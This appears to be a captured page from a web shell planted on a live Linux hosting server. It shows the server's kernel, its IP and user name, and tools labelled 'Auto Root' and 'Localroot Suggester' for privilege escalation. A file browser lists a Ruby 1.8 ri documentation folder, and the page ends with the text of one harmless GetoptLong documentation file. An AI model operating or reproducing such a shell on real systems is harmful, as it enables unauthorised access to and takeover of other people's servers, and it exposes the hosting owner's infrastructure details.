Linux velvet.gennetworks.in 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 161.129.70.235 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : virtueex
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
GetoptLong /
Delete
Unzip
Name
Size
Permission
Date
Action
AmbigousOption
[ DIR ]
drwxr-xr-x
2026-02-18 15:11
Error
[ DIR ]
drwxr-xr-x
2026-02-18 15:11
InvalidOption
[ DIR ]
drwxr-xr-x
2026-02-18 15:11
MissingArgument
[ DIR ]
drwxr-xr-x
2026-02-18 15:11
NeedlessArgument
[ DIR ]
drwxr-xr-x
2026-02-18 15:11
cdesc-GetoptLong.yaml
3.77
KB
-rw-r--r--
2023-07-26 19:17
each-i.yaml
694
B
-rw-r--r--
2023-07-26 19:17
each_option-i.yaml
234
B
-rw-r--r--
2023-07-26 19:17
error_message-i.yaml
321
B
-rw-r--r--
2023-07-26 19:17
get-i.yaml
650
B
-rw-r--r--
2023-07-26 19:17
get_option-i.yaml
231
B
-rw-r--r--
2023-07-26 19:17
new-c.yaml
1.03
KB
-rw-r--r--
2023-07-26 19:17
ordering%3d-i.yaml
2.5
KB
-rw-r--r--
2023-07-26 19:17
set_error-i.yaml
254
B
-rw-r--r--
2023-07-26 19:17
set_options-i.yaml
382
B
-rw-r--r--
2023-07-26 19:17
terminate-i.yaml
252
B
-rw-r--r--
2023-07-26 19:17
terminated%3f-i.yaml
283
B
-rw-r--r--
2023-07-26 19:17
Save
Rename
--- !ruby/object:RI::MethodDescription aliases: - !ruby/object:RI::AliasName name: get_option block_params: comment: - !ruby/struct:SM::Flow::P body: Get next option name and its argument, as an Array of two elements. - !ruby/struct:SM::Flow::P body: The option name is always converted to the first (preferred) name given in the original options to GetoptLong.new. - !ruby/struct:SM::Flow::P body: "Example: ['--option', 'value']" - !ruby/struct:SM::Flow::P body: Returns nil if the processing is complete (as determined by STATUS_TERMINATED). full_name: GetoptLong#get is_singleton: false name: get params: () visibility: public